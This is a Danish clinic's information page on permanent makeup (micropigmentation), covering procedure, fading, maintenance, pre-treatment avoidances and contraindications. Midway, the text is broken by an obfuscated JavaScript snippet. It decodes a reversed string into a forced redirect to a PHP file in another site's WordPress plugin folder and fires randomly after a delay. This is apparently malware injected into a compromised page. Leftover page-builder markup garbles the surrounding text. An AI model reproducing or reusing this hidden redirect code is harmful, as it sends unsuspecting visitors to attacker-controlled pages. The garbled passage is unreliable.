/Permanent Makeup

Mikropigmentering, også kaldet permanent makeup er en behandlingsprocedure, hvor man deponerer allergivenlige mineralske pigmenter øverst i det dermale lag af huden for at ændre eller forbedre sit udseende. Farven vil forblive i huden i 2-5 år, afhængigt af den individuelle hudtype, hudtilstand, hellbred og livsstil.

Vores farver er naturligvis EU-godkendte og 100 % sikre at anvende. Behandlingen udføres med mikrotynde nåle og revolutionerende højteknologisk udstyr, specielt udviklet til netop denne type behandling, hvilket sikrer dig mindre traumer, færre korrektioner efterfølgende og absolut fremragende resultater.

Formålet med disse procedurer kan være mange, men for at nævne et par stykker, så kan det udføres for at forbedre og justere på eventuelle små “skønhedsfejl”, at tilføre det, som er manglende fra naturens side, at øge selvtilliden, at spare tid og at give mulighed for en mere aktiv livsstil uden bekymringer om udtværet Make-up.

Hvis du forud for behandlingen, er i tvivl og har spørgsmål, anbefaler vi at du booker en tid til konsultation, hvor vi kan hjælpe dig med at besvare dine spørgsmål og tvivl om behandlingsform samt afstemt forventninger. Det er vigtigt, når du vælger at få udført en pmu behandling, at du er 100% sikker på din beslutning, og afklaret med at det er en behandling, som løbende kræver vedligeholdelse, for at bevare et pænt resultat.

Herunder kan du læse vigtig informationer om Permanent Makeup. Vi anbefaler at du læser det hele grundigt igennem. På denne måde er både du og vi sikret at du har fået den nødvendige viden omkring permanent makeup, inden du har besluttet dig for at få udført behandlingen.

Det er vigtigt du får et resultat du er tilfreds med, derfor er disse informationer du kan læse her vigtige.

Permanent makeup er en mere omfattende behandling. Man skal huske på at der arbejdes med pigmentter i levende væv som både har fordybninger, talgkirtler, hårsække og andet der kan påvirke overfladen. Man kan aldrig sammenligne stykke arbejde på en lukket hud (som ved almindelig makeup oven på huden) med levende væv (som når man arbejde nede i huden med permanent makeup).

Der er mange faktorer der spiller ind, når man deponerer pigmenter under huden og det kommer i kontakt med levende celler.  Derfor er det også vigtigt, at du som kunde, er informeret og har forståelse for de risici og faktorer der spiler ind ved Permanent Makeup.

Inden behandlingen vil du altid blive bedt om at udfylde et skema hvor du svare på spørgsmål om dit helbred og faktorer der kan have betydning for din permanent makeup. På denne måde kan vi bedst muligt forberede os og vejlede dig omkring behandlingen og det efterfølgende behandlingsforløb. Hvis vi ud fra snakken og geemgåelse af skemaet med dig vurdere at der er risicier, vil du blive informeret om dette inden din behandling og hvor vidt og omfanget af risicien ved det. Vi vil naturligvis vejlede dig ud fra disse informationer og give dig den nødvendige viden om hvor vidt du er egnet eller ikke egnet til behandlingen. På denne måde kan du til hve en til fravælge at få udført behandlingen.

Efter gennemgåelse af skemaet og risicier, analyserer vi din hudtype og hudtilstand, og du vil få yderligere information hvis dette har betydning for din resultat. Herefter laver vi en opmåling af dit ansigt ud fra det område der skal behandles og vi skitser med blyant ud fra vores ekspertise og dine ønsker, hvad der vlle klæde dig. Dette skal godkendes af dig som kunde, inden behandliingen går i gang. Derefter vælger vi vores farve, udfra den underliggende hudtone som kan være kold eller varm. Vi har alle forskellige undertoner i vores hud, og der er derfor ikke en farve, som trækker ens op på nogen. Denne analyse laver vi, for at undgå misfarvede bryn eller læber når området er ophelet, og derfor er det vigtigt at du er inforstået med at du ikke kan forvente at få samme resultat af farve, som eksempelvis din veninde, søster osv.

Pigmenter falmer: Det er vigtigt at understrege at ALLE pigmenter til permanent makeup, uanset hvem eller hvor du får det udført, falmer med tiden. Permanent akeup pigmenter er “lavet” til at falme med tiden, da det ikke skal holde resten af livet, som en rigtig traditionel tatovering. Brynfarver vil oftes trække rødligt eller gråligt op med tiden, hvis de ikke friskes op som anbefalet. Dette er fuldstændigt normalt, og kan meget nemt korrigeres ved en opfriskning af farven. Hvis du ikke længere ønske at have permanent makeup, så stopper man naturligvis bare med at få frisket det op, men man må derefter så også affinde sig med, at det falmer over tid, og ved permanent makeup af bryn, kan have denne rødlige eller grålige undertone i en periode, indtil farven er forsvundet helt. Du kan altid vælge at tegne op med almindelig makeup, så den falmede farve ikke kan ses.

Vedligeholdelse af permanent makeup: Vi anbefaler som udgangspunkt en opfriskning af bryn indenfor et år, og opfriskning af læber og eyeliner ca. hvert 2. år. Dette afhænger dog af hudtype, hudtilstand, helbred, livsstil osv. Anbefalingen om opfriskning er skrevet udfra gennemsnittet. Ved en opfriskning af farven indenfor den anbefalede tid, vil vi stadig kunne se faconen, fra den tidligere behandling, og det er derfor heller ikke en ligeså omfattende behandling, som første gang. Prisen for en opfriskning vil således også være billigere, og behandlingstiden vil være kortere.

Sjældne tilfælde: Desværre i sjældne tilfælde kan der sker komplikationer i form af at huden afstøder mere farve end forventet, og i disse tilfælde skal der udføres flere behandlinger end normalt for at få det ønsked og færdige resultat. I dette tilfælde betaler man for de nødvendige ekstra behandlinger.

Meget meget sjældne tilfælde: Kan der forekomme en total afstødelse af pigmentet, dvs. at huden ikke vil lagre farven og derfor er videre behandling ikke mulig. Dette kan ikke forudses og det kan ikke altid forklares hvorfor kroppen reagere sådan. Der ydes ingen tilbagebetaling for de behandlinger der er foretaget og dette må anses som værende, en sjælden risici.

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andlingen” use_background_color_gradient=”off” background_color_gradient_start=”#2b87da” background_color_gradient_end=”#29c4a9″ background_color_gradient_type=”linear” background_color_gradient_direction=”180deg” background_color_gradient_direction_radial=”center” background_color_gradient_start_position=”0%” background_color_gradient_end_position=”100%” parallax=”off” parallax_method=”on” background_size=”cover” background_position=”center” background_repeat=”no-repeat” background_blend=”normal” allow_player_pause=”off” tab_font_select=”default” tab_font=”||||” tab_line_height=”2em” tab_line_height_tablet=”2em” tab_line_height_phone=”2em” body_font_select=”default” body_font=”||||” body_line_height=”2em” body_line_height_tablet=”2em” body_line_height_phone=”2em”]

Du skal udgå følgende 48 timer op til din behandling:

 • Alkohol
 • Koffein
 • Blodfortyndende medicin
 • Smertestillende (undtaget panodil)
 • Stærk mad
 • Stærk antibiotika
 • Fiskeolie og E-vitamin

* Ved permanent makeup af læber og hvis man har tendens tendens til herpes (forkølelsessår) skal du til egen læge 1 uge før og have en forbyggende kur mod dette.

Permanent makeup er til alle, og især følgende kan have stor glæde af mikropigmentering/permanent makeup, både mænd og kvinder, som oplever følgende

 • Manglende hårvækst ved bryn, vipper eller formen
 • Pigmentforandringer fx ved læberne eller manglende pigment i læberne med udefineret læbekant
 • Ved sygdom, manglende hårvækst
 • Ikke har tydelige læbelinjer.
 • Har smalle / tynde læber.
 • Dyrker sport
 • Rysten på hænderne
 • Folk der er født med lyse vipper og bryn
 • Kvinder der gerne vil se friske ud døgnet rundt
 • Tunge øjne, manglende løft til øjnene
 • Ar
 • Hareskår
 • Alopecia
 • Allergi over for kosmetik
 • Nedsat syn, brugere af briller og/eller kontaktlinser
 • Før og efter kemoterapi

Når du vælger at få lavet permanent makeup, skal du vælge noget, som passer til din type, alder, hud og hårfarve. Så vil du aldrig fortryde din permanente makeup, fordi den vil glide ind i dine naturlige nuancer.

Bryn skal i de fleste tilfælde laves så naturligt som muligt. Farven lægges derfor som en skygge i de nuværende hår, så der opnås et meget naturligt resultat. Dog findes der personer med manglende hårvækst ved bryn. Her vil det være nødvendigt at lave en mere synlig pigmentering. Mange starter forsigtigt ud, og efter en årrække vælger nogle så at forstærke resultatet. Ved ønske om et tættere og mørkere bryn øges holdbarheden.

Amanda Isabel har mange års erfaring indenfor makeup, og uddannelse som stylist og makeup. Dette giver en sikker hånd og et perfekt resultat.

Som udgangspunkt, skal man være sund og rask, når man får lavet behandling og derfor er der således personer der ikke er egnede til Permanent Makeup, du kan læse de mest almindelige kontraindikationer herunder:

 • Kræft (alle former, der skal forelægge en læge erklæring, såfremt at der behandles alligevel og det er således også på eget ansvar at behandlingen udføres)
 • Ehler-Danlos syndrom (bindevævssygdom)
 • Ichtiosis (hudsygdom)
 • Psoreasis i det område der skal behandles (hudsygdom)
 • Tendens til keloid ardannelse
 • Lupus (reumatisk sygdom)

Udover disse kontraindikationer er der også en række forbigående kontraindikationer, som kan betyde at du skal vente med behandling og derfor er det vigtigt at du oplyser os om dit helbred, så vi kan råde og vejlede dig korrekt. Se eksempler på forbigående kontraindikationer herunder:

 • Gravid og/eller ammende
 • Herpes/forkølelsessår
 • Brug af Roaccutane
 • Brug af Kortokosteroider
 • Betændelsestilstande i kroppen
 • Feber
 • Hormonforstyrrende præparater
 • Gratis for-konsultation
 • Gratis allergi-check
 • Ved konsultation har du mulighed for at stille spørgsmål og vi snakker om dine ønsker i forhold til resultatet.